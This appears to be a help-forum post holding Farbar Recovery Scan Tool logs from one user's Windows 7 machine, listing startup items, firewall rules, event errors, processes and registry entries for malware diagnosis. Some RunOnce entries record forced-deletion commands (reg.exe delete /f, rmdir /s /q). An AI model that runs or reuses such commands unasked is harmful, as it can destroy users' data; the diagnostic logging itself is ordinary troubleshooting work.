    MSCONFIG\startupreg: ADSKAppManager => "C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgr.exe" -showminimized -checkautorun
    MSCONFIG\startupreg: AirDroid 3 => C:\Program Files (x86)\AirDroid\AirDroid.exe /start
    MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
    MSCONFIG\startupreg: BCSSync => "C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServices
    MSCONFIG\startupreg: BlueStacks Agent => C:\Program Files (x86)\BlueStacks\HD-Agent.exe
    MSCONFIG\startupreg: CCleaner Monitoring => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
    MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
    MSCONFIG\startupreg: Greenshot => C:\Program Files\Greenshot\Greenshot.exe
    MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
    MSCONFIG\startupreg: Pushbullet => "C:\Program Files (x86)\Pushbullet\pushbullet.exe" -show false
    MSCONFIG\startupreg: Sidebar => C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
    MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
    MSCONFIG\startupreg: uTorrent => "C:\Users\WELCOME\AppData\Roaming\uTorrent\uTorrent.exe" /MINIMIZED
    MSCONFIG\startupreg: WiFiShare => "C:\Program Files (x86)\Wi-Fi\Wi-Fi.exe"
    MSCONFIG\startupreg: WinampAgent => "C:\Program Files (x86)\Winamp\winampa.exe"

    ==================== FirewallRules (Whitelisted) ===============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    FirewallRules: [TCP Query User{D0ED51D2-6203-4753-B1B9-804E7728AB41}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
    FirewallRules: [UDP Query User{91259D9C-DDDE-4957-B69F-4311F23331CB}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
    FirewallRules: [{F25F1646-8C9B-4FE0-9B5A-A155A246BFCC}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
    FirewallRules: [{B189C102-FD99-4524-A7EE-40699DEBB32A}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
    FirewallRules: [{52D0BF70-F02D-4B4F-955B-937BD9BF68BF}] => (Allow) C:\Program Files (x86)\Nero\Nero Blu-ray Player\Blu-rayPlayer.exe
    FirewallRules: [{4F408890-3EC8-450E-B2BC-8846F74D4022}] => (Allow) C:\Program Files (x86)\Nero\Nero Blu-ray Player\Blu-rayPlayer.exe
    FirewallRules: [{7933003A-8BC9-42BA-A4CE-97266B91A16A}] => (Allow) C:\Program Files (x86)\Nero\KM\NMDllHost.exe
    FirewallRules: [{818D1D8E-8701-4629-9C58-C24CD40CD227}] => (Allow) C:\Program Files (x86)\Nero\KM\NMDllHost.exe
    FirewallRules: [{B1E52EA3-9087-4BBE-AB78-337E4E1BE37A}] => (Allow) E:\Halo 2\halo2.exe
    FirewallRules: [{DB42344B-E29D-471A-816A-0DB775551DB0}] => (Allow) E:\Halo 2\halo2.exe
    FirewallRules: [{88F1F453-5494-43E7-ACAD-2CCC728392A2}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
    FirewallRules: [{AB522F61-AA75-44B1-91D5-A0E38C6F50A3}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{19AE1153-5A02-4219-BB03-C9B2C7D96BA8}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{448FBDFF-0F27-40C0-8A62-0EF61697A285}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{B28A5054-13DF-4435-9EC7-27D9E9CAF2E6}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{1191A94A-52A8-4A9D-99F0-8D5D7134F2E4}] => (Allow) C:\Program Files (x86)\iTunes\iTunes.exe
    FirewallRules: [TCP Query User{9D757DCF-7426-43E7-B947-9F2D9A8CDABC}C:\program files (x86)\airdroid\airdroid.exe] => (Allow) C:\program files (x86)\airdroid\airdroid.exe
    FirewallRules: [UDP Query User{4AEC743F-9635-458A-ABBC-59AAF703FB1A}C:\program files (x86)\airdroid\airdroid.exe] => (Allow) C:\program files (x86)\airdroid\airdroid.exe
    FirewallRules: [{025B1FA6-BEFB-4EA5-B33C-D865EA3B6CE4}] => (Allow) C:\Program Files (x86)\pandasecuritytb\dtUser.exe
    FirewallRules: [{BE9D44D5-C882-456E-93EB-E21083969B3C}] => (Allow) C:\Program Files (x86)\pandasecuritytb\dtUser.exe
    FirewallRules: [{83E823B3-DE03-4406-9AC0-87FB88D1FE0D}] => (Allow) C:\Users\WELCOME\AppData\Roaming\uTorrent\uTorrent.exe
    FirewallRules: [{B418AD8E-2F6C-4EB0-AB54-C865729BDCF4}] => (Allow) C:\Users\WELCOME\AppData\Roaming\uTorrent\uTorrent.exe
    FirewallRules: [{0F5B56A6-2AE4-4410-8A0B-5D4C8D0D4215}] => (Allow) C:\Users\WELCOME\AppData\Roaming\uTorrent\uTorrent.exe
    FirewallRules: [{93A591AC-0873-45D0-8E83-53FB076D3574}] => (Allow) C:\Users\WELCOME\AppData\Roaming\uTorrent\uTorrent.exe
    FirewallRules: [{513B16FD-157A-4F63-A326-28F9DF27863C}] => (Allow) C:\Users\WELCOME\AppData\Roaming\uTorrent\uTorrent.exe
    FirewallRules: [{C02E2E0A-779E-4B80-8A19-7E0D3E74CE5F}] => (Allow) C:\Users\WELCOME\AppData\Roaming\uTorrent\uTorrent.exe
    FirewallRules: [{81E63C48-EF1C-4197-A792-CC6F910D9542}] => (Allow) C:\Program Files (x86)\Wi-Fi\Wi-Fi.exe
    FirewallRules: [{5FC51A79-1BA4-4A6E-8A81-C556C429A9A5}] => (Allow) C:\Program Files (x86)\Wi-Fi\TX_Httpd.exe
    FirewallRules: [TCP Query User{E38A9C8D-9F74-45C3-9C9F-941B852A88AD}C:\program files (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\vlc.exe
    FirewallRules: [UDP Query User{4EDDC5E3-15AB-44B8-AC0E-1A6FF0DBC50B}C:\program files (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\vlc.exe
    FirewallRules: [TCP Query User{490F4279-75D5-42CC-8361-E86C0EDB2C69}C:\program files (x86)\airdroid\airdroid.exe] => (Allow) C:\program files (x86)\airdroid\airdroid.exe
    FirewallRules: [UDP Query User{BFDAD4B8-5A2D-43CD-9E47-7DA8944467C0}C:\program files (x86)\airdroid\airdroid.exe] => (Allow) C:\program files (x86)\airdroid\airdroid.exe
    FirewallRules: [{766A022E-9683-40F8-BB4D-9B5A4FEE95A5}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    FirewallRules: [TCP Query User{80F18ED6-5C9C-4E45-B3A7-30401FFF5435}E:\need for speed most wanted 2013\nfs13.exe] => (Block) E:\need for speed most wanted 2013\nfs13.exe
    FirewallRules: [UDP Query User{BF968C13-089A-41FD-BC9D-D0B6B271ADF6}E:\need for speed most wanted 2013\nfs13.exe] => (Block) E:\need for speed most wanted 2013\nfs13.exe
    FirewallRules: [TCP Query User{FCE17CFC-5778-4E86-9988-AB6D2FD931AF}C:\program files (x86)\soundwire server\soundwireserver.exe] => (Allow) C:\program files (x86)\soundwire server\soundwireserver.exe
    FirewallRules: [UDP Query User{B40B9540-1081-4B84-B720-92282C3FE1B5}C:\program files (x86)\soundwire server\soundwireserver.exe] => (Allow) C:\program files (x86)\soundwire server\soundwireserver.exe

    ==================== Restore Points =========================

    11-03-2016 15:46:35 Scheduled Checkpoint

    ==================== Faulty Device Manager Devices =============

    Name: Teredo Tunneling Pseudo-Interface
    Description: Microsoft-Teredo-Tunneling-Adapter
    Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
    Manufacturer: Microsoft
    Service: tunnel
    Problem: : This device cannot start. (Code10)
    Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
    On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

    Name: Azzouzi HotSpot LightWeight Filter
    Description: Azzouzi HotSpot LightWeight Filter
    Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
    Manufacturer:
    Service: ndiskhaz
    Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
    Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
    Devices stay in this state if they have been prepared for removal.
    After you remove the device, this error disappears.Remove the device, and this error should be resolved.


    ==================== Event log errors: =========================

    Application errors:
    ==================
    Error: (03/11/2016 10:45:09 PM) (Source: BstHdAndroidSvc) (EventID: 0) (User: )
    Description: Service cannot be started. System.ApplicationException: Cannot start service. Service did not stop gracefully the last time it was run.
    at BlueStacks.hyperDroid.Service.Service.OnStart(String[] args)
    at System.ServiceProcess.ServiceBase.ServiceQueuedMainCallback(Object state)

    Error: (03/11/2016 10:45:09 PM) (Source: WinMgmt) (EventID: 10) (User: )
    Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

    Error: (03/11/2016 08:56:38 PM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Name der fehlerhaften Anwendung: VideoAcceleratorService.exe, Version: 3.3.8.0, Zeitstempel: 0x51c03e8a
    Name des fehlerhaften Moduls: ntdll.dll, Version: 6.1.7601.19110, Zeitstempel: 0x5684255b
    Ausnahmecode: 0xc0000005
    Fehleroffset: 0x0002e3c6
    ID des fehlerhaften Prozesses: 0xa6c
    Startzeit der fehlerhaften Anwendung: 0xVideoAcceleratorService.exe0
    Pfad der fehlerhaften Anwendung: VideoAcceleratorService.exe1
    Pfad des fehlerhaften Moduls: VideoAcceleratorService.exe2
    Berichtskennung: VideoAcceleratorService.exe3

    Error: (03/11/2016 08:18:44 PM) (Source: WinMgmt) (EventID: 10) (User: )
    Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

    Error: (03/11/2016 08:18:30 PM) (Source: BstHdAndroidSvc) (EventID: 0) (User: )
    Description: Service cannot be started. System.ApplicationException: Cannot start service. Service did not stop gracefully the last time it was run.
    at BlueStacks.hyperDroid.Service.Service.OnStart(String[] args)
    at System.ServiceProcess.ServiceBase.ServiceQueuedMainCallback(Object state)

    Error: (03/11/2016 05:43:13 PM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Name der fehlerhaften Anwendung: VideoAcceleratorService.exe, Version: 3.3.8.0, Zeitstempel: 0x51c03e8a
    Name des fehlerhaften Moduls: ntdll.dll, Version: 6.1.7601.19110, Zeitstempel: 0x5684255b
    Ausnahmecode: 0xc0000005
    Fehleroffset: 0x00032973
    ID des fehlerhaften Prozesses: 0xa50
    Startzeit der fehlerhaften Anwendung: 0xVideoAcceleratorService.exe0
    Pfad der fehlerhaften Anwendung: VideoAcceleratorService.exe1
    Pfad des fehlerhaften Moduls: VideoAcceleratorService.exe2
    Berichtskennung: VideoAcceleratorService.exe3

    Error: (03/11/2016 02:24:35 PM) (Source: Windows Search Service) (EventID: 7010) (User: )
    Description: Der Index kann nicht initialisiert werden.

    Details:
    The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

    Error: (03/11/2016 02:24:35 PM) (Source: Windows Search Service) (EventID: 3058) (User: )
    Description: Die Anwendung kann nicht initialisiert werden.

    Context: Windows Application

    Details:
    The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

    Error: (03/11/2016 02:24:35 PM) (Source: Windows Search Service) (EventID: 3028) (User: )
    Description: Das Gatherer-Objekt kann nicht initialisiert werden.

    Context: Windows Application, SystemIndex Catalog

    Details:
    The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

    Error: (03/11/2016 02:24:35 PM) (Source: Windows Search Service) (EventID: 3029) (User: )
    Description: Plug-In in <Search.TripoliIndexer> kann nicht initialisiert werden.

    Context: Windows Application, SystemIndex Catalog

    Details:
    Element not found. (HRESULT : 0x80070490) (0x80070490)


    System errors:
    =============
    Error: (03/13/2016 12:29:51 PM) (Source: ipnathlp) (EventID: 1233) (User: )
    Description:

    Error: (03/13/2016 12:17:44 PM) (Source: ipnathlp) (EventID: 1233) (User: )
    Description:

    Error: (03/13/2016 11:49:35 AM) (Source: TermDD) (EventID: 50) (User: )
    Description: Die RDP-Protokollkomponente X.224 hat einen Fehler im Protokollablauf festgestellt und die Clientverbindung getrennt.

    Error: (03/13/2016 10:15:45 AM) (Source: TermDD) (EventID: 50) (User: )
    Description: Die RDP-Protokollkomponente X.224 hat einen Fehler im Protokollablauf festgestellt und die Clientverbindung getrennt.

    Error: (03/13/2016 07:17:47 AM) (Source: TermDD) (EventID: 50) (User: )
    Description: Die RDP-Protokollkomponente X.224 hat einen Fehler im Protokollablauf festgestellt und die Clientverbindung getrennt.

    Error: (03/13/2016 06:53:11 AM) (Source: ipnathlp) (EventID: 1233) (User: )
    Description:

    Error: (03/13/2016 06:41:04 AM) (Source: ipnathlp) (EventID: 1233) (User: )
    Description:

    Error: (03/13/2016 06:03:22 AM) (Source: ipnathlp) (EventID: 1233) (User: )
    Description:

    Error: (03/13/2016 05:51:15 AM) (Source: ipnathlp) (EventID: 1233) (User: )
    Description:

    Error: (03/13/2016 05:51:07 AM) (Source: TermDD) (EventID: 50) (User: )
    Description: Die RDP-Protokollkomponente X.224 hat einen Fehler im Protokollablauf festgestellt und die Clientverbindung getrennt.


    CodeIntegrity:
    ===================================
    Date: 2016-03-11 22:44:30.087
    Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\scdemu.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

    Date: 2016-03-11 22:44:30.056
    Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\scdemu.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

    Date: 2016-03-11 20:17:58.903
    Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\scdemu.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

    Date: 2016-03-11 20:17:58.872
    Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\scdemu.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

    Date: 2016-03-11 14:21:46.168
    Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\scdemu.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

    Date: 2016-03-11 14:21:46.137
    Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\scdemu.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

    Date: 2016-03-11 10:29:37.638
    Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\scdemu.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

    Date: 2016-03-11 10:29:37.607
    Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\scdemu.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

    Date: 2016-03-11 02:34:07.714
    Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\scdemu.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

    Date: 2016-03-11 02:34:07.683
    Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\scdemu.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.


    ==================== Memory info ===========================

    Processor: Intel(R) Core(TM) i5-4440 CPU @ 3.10GHz
    Percentage of memory in use: 70%
    Total physical RAM: 3907.33 MB
    Available physical RAM: 1161.3 MB
    Total Virtual: 7812.86 MB
    Available Virtual: 4844.68 MB

    ==================== Drives ================================

    Drive c: (WIN7) (Fixed) (Total:200 GB) (Free:94.05 GB) NTFS
    Drive e: (PREM) (Fixed) (Total:200.1 GB) (Free:120.86 GB) NTFS
    Drive f: (STUDIO) (Fixed) (Total:200.1 GB) (Free:6.74 GB) NTFS
    Drive g: (New Volume) (Fixed) (Total:331.22 GB) (Free:331.08 GB) NTFS
    Drive h: (Transcend) (Fixed) (Total:931.51 GB) (Free:446.45 GB) NTFS

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: C9C5FB82)
    Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
    Partition 2: (Not Active) - (Size=200 GB) - (Type=07 NTFS)
    Partition 3: (Not Active) - (Size=200.1 GB) - (Type=07 NTFS)
    Partition 4: (Not Active) - (Size=531.3 GB) - (Type=OF Extended)

    ========================================================
    Disk: 1 (MBR Code: Windows XP) (Size: 931.5 GB) (Disk ID: 1B017802)
    Partition 1: (Active) - (Size=931.5 GB) - (Type=07 NTFS)

    ==================== End of Addition.txt ============================
     
  6. blackclaw96

    blackclaw96 TS Rookie Topic Starter

    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
    Ran by WELCOME (administrator) on DIABLO (13-03-2016 13:19:14)
    Running from C:\Users\WELCOME\Desktop
    Loaded Profiles: WELCOME (Available Profiles: WELCOME & Guest)
    Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: Englisch (USA)
    Internet Explorer Version 11 (Default browser: Chrome)
    Boot Mode: Normal
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    (The Within Network, LLC) C:\Windows\UnsignedThemesSvc.exe
    (Intel Corporation) C:\Windows\System32\igfxCUIService.exe
    (Autodesk Inc.) C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgrSvc.exe
    (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
    (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
    (BlueStack Systems, Inc.) C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe
    (BlueStack Systems, Inc.) C:\Program Files (x86)\BlueStacks\HD-UpdaterService.exe
    (Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
    (Autodesk, Inc.) C:\Program Files\Autodesk\Inventor 2015\Moldflow\bin\mitsijm.exe
    () C:\Program Files (x86)\Wi-Fi\WiFiGxSvc.exe
    (Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Cloud Antivirus\PSANHost.exe
    (Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Devices Agent\AgentSvc.exe
    (Visicom Media Inc.) C:\ProgramData\Panda Security URL Filtering\Panda_URL_Filteringb.exe
    (Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Cloud Antivirus\PSUAService.exe
    () C:\Program Files\CyberLink\Shared files\RichVideo64.exe
    (SPEEDbit) C:\Program Files (x86)\SpeedBit Video Accelerator\VideoAcceleratorService.exe
    (Microsoft Corporation) C:\Windows\System32\rundll32.exe
    (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
    (Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IDMan.exe
    () C:\Program Files (x86)\Codebox\BitMeter\BitMeter2.exe
    (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
    (Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Cloud Antivirus\PSUAMain.exe
    (Visicom Media Inc.) C:\ProgramData\Panda Security URL Filtering\Panda_URL_Filtering.exe
    (Microsoft Corporation) C:\Windows\System32\cmd.exe
    (Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe
    (Intel Corporation) C:\Windows\System32\igfxEM.exe
    (Intel Corporation) C:\Windows\System32\igfxHK.exe
    (Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
    (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
    (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
    (Nero AG) C:\Program Files (x86)\Nero\Update\NASvc.exe
    (Tx-Network) C:\Program Files (x86)\Wi-Fi\Wi-Fi.exe
    (Microsoft Corporation) C:\Windows\System32\alg.exe
    (Nullsoft, Inc.) C:\Program Files (x86)\Winamp\winamp.exe
    (Sand Studio) C:\Program Files (x86)\AirDroid\AirDroid.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Microsoft Corporation) C:\Windows\System32\dllhost.exe


    ==================== Registry (Whitelisted) ===========================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13671792 2014-03-14] (Realtek Semiconductor)
    HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2014-02-21] (Intel Corporation)
    HKLM-x32\...\Run: [PSUAMain] => C:\Program Files (x86)\Panda Security\Panda Cloud Antivirus\PSUAMain.exe [37624 2014-05-06] (Panda Security, S.L.)
    HKLM-x32\...\Run: [Panda Security URL Filtering] => C:\ProgramData\Panda Security URL Filtering\Panda_URL_Filtering.exe [235072 2013-04-11] (Visicom Media Inc.)
    HKU\S-1-5-21-3006523739-2206101463-1198655294-1000\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [3565432 2013-03-08] (Tonec Inc.)
    HKU\S-1-5-21-3006523739-2206101463-1198655294-1000\...\Run: [SpeedBitVideoAccelerator] => C:\Program Files (x86)\SpeedBit Video Accelerator\VideoAccelerator.exe [1517224 2016-01-25] (SPEEDbit)
    HKU\S-1-5-21-3006523739-2206101463-1198655294-1000\...\Run: [uTorrent] => C:\Users\WELCOME\AppData\Roaming\uTorrent\uTorrent.exe [2026520 2015-12-03] (BitTorrent Inc.)
    HKU\S-1-5-21-3006523739-2206101463-1198655294-1000\...\Policies\system: [LogonHoursAction] 2
    HKU\S-1-5-21-3006523739-2206101463-1198655294-1000\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
    HKU\S-1-5-21-3006523739-2206101463-1198655294-1000\...\MountPoints2: {28e9f98b-7195-11e5-8079-42a26be3017f} - EXPLORER .\Driver_Auto_Installer_v1.352.00\
    HKU\S-1-5-18\...\Run: [Autodesk Sync] => C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe [1193352 2014-02-19] (Autodesk, Inc.)
    HKU\S-1-5-18\...\RunOnce: [panda4_0dn] => reg.exe delete "HKCU\Software\AppDataLow\Software\panda4_0dn" /f
    HKU\S-1-5-18\...\RunOnce: [panda4_0dn_XP] => reg.exe delete "HKCU\Software\panda4_0dn" /f
    HKU\S-1-5-18\...\RunOnce: [panda4_0dn_DATA_FOLDER] => cmd.exe /c rmdir "C:\ProgramData\Panda Security URL Filtering" /s /q
    HKU\S-1-5-18\...\RunOnce: [panda4_0dn_INSTALL_FOLDER] => cmd.exe /c rmdir "C:\Windows\system32\config\systemprofile\AppData\Local\panda4_0dn" /s /q
    HKU\S-1-5-18\...\RunOnce: [panda] => reg.exe delete "HKCU\Software\AppDataLow\Software\panda" /f
    HKU\S-1-5-18\...\RunOnce: [panda_XP] => reg.exe delete "HKCU\Software\panda" /f
    ShellIconOverlayIdentifiers: [IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2012-11-16] (Tonec Inc.)
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bitmeter2.lnk [2015-10-19]
    ShortcutTarget: Bitmeter2.lnk -> C:\Program Files (x86)\Codebox\BitMeter\BitMeter2.exe ()
    GroupPolicyScripts-x32: Restriction <======= ATTENTION

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    Winsock: Catalog9 01 C:\Program Files (x86)\SpeedBit Video Accelerator\sblsp.dll [177320 2016-01-25] (SPEEDbit)
    Winsock: Catalog9 02 C:\Program Files (x86)\SpeedBit Video Accelerator\sblsp.dll [177320 2016-01-25] (SPEEDbit)
    Winsock: Catalog9 03 C:\Program Files (x86)\SpeedBit Video Accelerator\sblsp.dll [177320 2016-01-25] (SPEEDbit)
    Winsock: Catalog9 04 C:\Program Files (x86)\SpeedBit Video Accelerator\sblsp.dll [177320 2016-01-25] (SPEEDbit)
    Winsock: Catalog9 05 C:\Program Files (x86)\SpeedBit Video Accelerator\sblsp.dll [177320 2016-01-25] (SPEEDbit)
    Winsock: Catalog9 06 C:\Program Files (x86)\SpeedBit Video Accelerator\sblsp.dll [177320 2016-01-25] (SPEEDbit)
    Winsock: Catalog9 07 C:\Program Files (x86)\SpeedBit Video Accelerator\sblsp.dll [177320 2016-01-25] (SPEEDbit)
    Winsock: Catalog9 08 C:\Program Files (x86)\SpeedBit Video Accelerator\sblsp.dll [177320 2016-01-25] (SPEEDbit)
    Winsock: Catalog9 19 C:\Program Files (x86)\SpeedBit Video Accelerator\sblsp.dll [177320 2016-01-25] (SPEEDbit)
    Tcpip\Parameters: [DhcpNameServer] 113.193.12.14 113.193.1.14
    Tcpip\..\Interfaces\{A4E4674C-51BA-4B4D-AFFC-E6DA1B5BD343}: [DhcpNameServer] 113.193.12.14 113.193.1.14
    Tcpip\..\Interfaces\{B13643F6-5835-428B-BF48-38C265892F17}: [NameServer] 8.8.8.8,8.8.4.4
    Tcpip\..\Interfaces\{B13643F6-5835-428B-BF48-38C265892F17}: [DhcpNameServer] 192.168.42.129

    Internet Explorer:
    ==================
    URLSearchHook: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000 - Panda Security Toolbar - {B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} - C:\Program Files (x86)\pandasecuritytb\pandasecurityDx64.dll ()
    URLSearchHook: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000 - Panda Security Toolbar - {B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} - C:\Program Files (x86)\pandasecuritytb\pandasecurityDx.dll ()
    BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2013-01-29] (Internet Download Manager, Tonec Inc.)
